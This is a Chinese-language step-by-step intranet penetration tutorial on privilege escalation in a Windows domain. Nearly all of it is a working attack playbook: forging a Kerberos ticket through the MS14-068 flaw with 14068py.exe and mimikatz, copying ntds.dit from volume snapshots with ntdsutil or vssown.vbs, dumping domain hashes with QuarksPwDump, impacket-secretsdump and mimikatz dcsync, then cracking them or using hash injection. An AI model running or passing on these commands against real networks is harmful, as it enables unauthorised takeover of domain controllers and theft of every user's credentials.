內網滲透之——域滲透中利用ms-14-068漏洞進行票據僞裝獲取域管賬號密碼

利用過程

1.利用該漏洞僞裝票據

2.導出域hash值

3.破解利用hash值

一、利用漏洞僞裝票據

條件

知道域名，sid，並擁有一個域普通用戶的賬號密碼和知道域控的名稱

步驟

1.拿到一臺普通域用戶機器，獲取sid

whoami /all

2.域名，域控名獲取

域名獲取：

ipconfig /all  

查詢域控：

net time /domain

3.上傳14068py.exe,命令行輸入命令進行票據僞裝，會在當前目錄下生成一個TGT文件

14068py.exe -u 域用戶全稱 -p "密碼" -s sid -d 域控名全稱

用戶全名爲：用戶名@域名

4.輸入klist purge可刪除所有票據

5.上傳mimikatz.exe,輸入命令使用剛纔僞裝的票據

mimikatz.exe "kerberos::ptc xxxxx" exit

xxxxx處替換剛纔生成的TGT文件名

6.輸入klist查看票據，替換成功

7.無需輸入密碼即可查看域控的c盤目錄，說明域管身份的票據僞裝成功

dir \\域控全稱\c$

二、導出域hash值

·獲取ntds.dit並分析獲得hash

思路

    1.票據僞裝成功後遠程連接，利用計劃任務或遠程執行控制DC執行命令(此處實驗直接在dc進行，利用計劃任務或遠程執行控制DC執行命令點擊此處跳轉到詳細使用方法)
    2.利用工具獲取、分析得到域hash值

1.獲取ntds.dit

1.1 利用ntdsutil(win8之後自帶)導出ntds.dit

1.1.1 交互式shell：

輸入ntdsutil進入交互式界面

輸入snapshot進入快照功能

將活動實例設置爲ntds

activate instance ntds

輸入create創建快照

將快照掛載到c盤，此時c盤就出現了一個和c盤內容一樣的快照，並且沒有被佔用

mount 快照名

 

退出ntdsutil，複製快照下的ntds.dit到指定路徑（離線分析還需要複製快照裏的Windows\System32\config\SYSTEM，在線分析省略）

copy C:\$SNAP_202003310959_VOLUMEC$\Windows\NTDS\ntds.dit c:\

再次進入ntdsutil的快照功能，刪除快照

ntdsutil
snapshot
unmount 快照名

1.1.2 非交互式shell：

輸入以下命令直接一次性創建快照並退出

ntdsutil snapshot "activate instance ntds" create quit quit

輸入以下命令掛載剛剛生成的快照

ntdsutil snapshot "mount 快照名" quit quit

複製快照下的ntds.dit到指定路徑（離線分析還需要複製快照裏的Windows\System32\config\SYSTEM，在線分析省略）

copy C:\$SNAP_202003311014_VOLUMEC$\Windows\NTDS\ntds.dit c:\ntds1.dit

刪除快照

ntdsutil snapshot "unmount 快照名" quit quit

1.2 vssown.vbs提取ntds.dit

上傳腳本並開始運行腳本

cscript vssown.vbs /start

查看運行狀態

cscript vssown.vbs /status

創建c盤的快照

cscript vssown.vbs /create C

查看快照信息

cscript vssown.vbs /list

\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1        即爲c盤快照的根目錄路

將快照裏的ntds.dit複製到當前目錄

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\ntds\ntds.dit ntds.dit

將快照裏的SYSTEM複製到當前目錄(離線分析需要，在線分析省略)

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM SYSTEM

刪除創建的快照

cscript vssown.vbs /delete *

停止腳本運行

cscript vssown.vbs /stop

2.分析ntds.dit

2.1 利用QuarkPwDump在線分析

上傳QuarkPwDump.exe到目標機c:/

輸入命令獲取ntds.dit裏的域用戶密碼

QuarksPwDump.exe --dump-hash-domain --with-history --ntds-file ntds.dit路徑

2.2 利用kali裏的impacket-secretsdump離線分析

複製生成的ntds.dit和SYSTEM到kali

終端輸入命令破解ntds.dit

impacket-secretsdump -ntds ntds.dit -system SYSTEM local

 

·mimikatz提取hash

條件

獲取普通域成員機的shell即可

步驟

在上述14068僞裝票據的基礎上遠程連接dc

輸入mimikatz.exe進入軟件

提取指定域用戶的hash值

lsadump::dcsync /domain:域名 /user:用戶名 /csv

三、破解密碼

利用破解工具，cmd5進行破解，破解不成功可嘗試hash注入

點擊此處查看hash注入具體使用方法